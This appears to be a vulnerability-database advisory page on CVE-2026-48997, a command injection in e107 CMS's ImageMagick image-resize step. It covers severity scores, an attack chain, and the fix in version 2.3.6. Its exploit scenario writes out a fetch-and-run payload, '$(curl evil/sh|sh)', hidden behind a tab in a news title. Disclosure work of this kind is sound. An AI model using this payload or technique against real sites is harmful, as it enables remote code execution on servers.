Skip to main content

e107 CMS CVE-2026-48997

HIGH
OS Command Injection (CWE-78)
2026-06-17 GitHub_M
7.1
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
7.1 HIGH
AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H
vuln.today AI
7.5 HIGH

Network-reachable via news submission (AV:N); five non-default prefs plus class membership justify AC:H; requires authenticated non-admin (PR:L); shell RCE as web user yields full CIA impact.

3.1 AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H
Attack Vector
Network
Attack Complexity
High
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
High
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 17, 2026 - 22:18 vuln.today
Analysis Generated
Jun 17, 2026 - 22:18 vuln.today

DescriptionCVE.org

e107 is a content management system (CMS). Versions 2.3.5 and earlier contain a command injection vulnerability in the ImageMagick resize destination path. In resize_image(), the source path is escaped with escapeshellarg(), but the destination path is inserted inside raw double quotes in the convert command; in the submit-news upload flow, that destination filename includes the first six characters of user-controlled news title input. Because the title filter removes literal spaces but not tab characters, and shell expansions such as $(...) and backticks can survive into the quoted destination argument, /bin/sh -c may evaluate attacker-controlled input. Exploitation is possible only when all of the following non-default settings are enabled: resize_method=ImageMagick, subnews_attach=1, upload_enabled=1, subnews_resize is numeric between 30 and 5000, and the attacker is a non-admin in classes permitted by both subnews_class and upload_class. This issue has been fixed in version 2.3.6.

AnalysisAI

Command injection in e107 CMS versions 2.3.5 and earlier allows authenticated low-privilege users to execute arbitrary shell commands as the web server user via the news submission upload flow. The flaw lives in resize_image() where the ImageMagick convert destination path embeds a 6-character slice of the user-controlled news title without shell escaping, letting tab characters and $(...) / backtick expansions reach /bin/sh -c. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Register low-privilege account in permitted class
Delivery
Craft news title with tab and $(cmd) payload
Exploit
Submit news with image attachment
Install
resize_image() builds convert command with unescaped destination
C2
/bin/sh -c expands payload
Execute
Shell command executes as web server user
Impact
Persist webshell or pivot

Vulnerability AssessmentAI

Exploitation Exploitation requires all of the following on the target e107 site: site preference resize_method=ImageMagick (default is GD), subnews_attach=1, upload_enabled=1, subnews_resize set to a numeric value between 30 and 5000, and the attacker's user class must be permitted by both subnews_class AND upload_class. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score of 7.1 (AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H) reflects a network-reachable but high-complexity, low-privilege flaw with strong integrity/availability impact - consistent with shell command execution as www-data. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers a normal user account on a target e107 site whose admin has enabled ImageMagick resizing and reader news submission with attachments. They submit a news article whose title begins with six characters containing a tab followed by a shell substitution such as \t$(curl evil/sh|sh), then attach an image; when the upload handler invokes convert, /bin/sh -c expands the embedded command and the attacker gains code execution as the web server user. …
Remediation Vendor-released patch: e107 v2.3.6 - upgrade from any 2.x release at or below 2.3.5 via https://github.com/e107inc/e107/releases/tag/v2.3.6 (commit 794a179f hardens the convert destination path). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all e107 CMS deployments and document versions; disable news submission permissions for all non-administrator accounts; review access logs for unexpected news submission activity. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in E107

View all
CVE-2022-50905 CRITICAL POC
9.8 Jan 13

e107 CMS 3.2.1 has multiple XSS vulnerabilities in news comments that allow executing arbitrary JavaScript. Rated CVSS 9

CVE-2021-27885 HIGH POC
8.8 Mar 02

usersettings.php in e107 through 2.3.0 lacks a certain e_TOKEN protection mechanism. Rated high severity (CVSS 8.8), thi

CVE-2018-15901 HIGH POC
8.8 Aug 28

e107 2.1.8 has CSRF in 'usersettings.php' with an impact of changing details such as passwords of users including admini

CVE-2022-50939 HIGH POC
7.2 Jan 13

e107 CMS version 3.2.1 contains a critical file upload vulnerability that allows authenticated administrators to overrid

CVE-2016-10378 HIGH POC
7.2 May 29

e107 2.1.1 allows SQL injection by remote authenticated administrators via the pagelist parameter to e107_admin/menus.ph

CVE-2022-50907 HIGH POC
7.2 Jan 13

e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrative users to bypass upl

CVE-2022-50916 HIGH POC
7.2 Jan 13

e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrators to override server

CVE-2018-16388 HIGH POC
7.2 Sep 12

e107_web/js/plupload/upload.php in e107 2.1.8 allows remote attackers to execute arbitrary PHP code by uploading a .php

CVE-2012-6433 MEDIUM POC
6.8 Jan 03

Cross-site request forgery (CSRF) vulnerability in e107_admin/newspost.php in e107 1.0.1 allows remote attackers to hija

CVE-2012-6434 MEDIUM POC
6.8 Jan 03

Multiple cross-site request forgery (CSRF) vulnerabilities in e107_admin/download.php in e107 1.0.2 allow remote attacke

CVE-2018-16381 MEDIUM POC
6.1 Sep 05

e107 2.1.8 has XSS via the e107_admin/users.php?mode=main&action=list user_loginname parameter. Rated medium severity (C

CVE-2023-36121 MEDIUM POC
5.4 Aug 02

Cross Site Scripting vulnerability in e107 v.2.3.2 allows a remote attacker to execute arbitrary code via the descriptio

Share

CVE-2026-48997 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy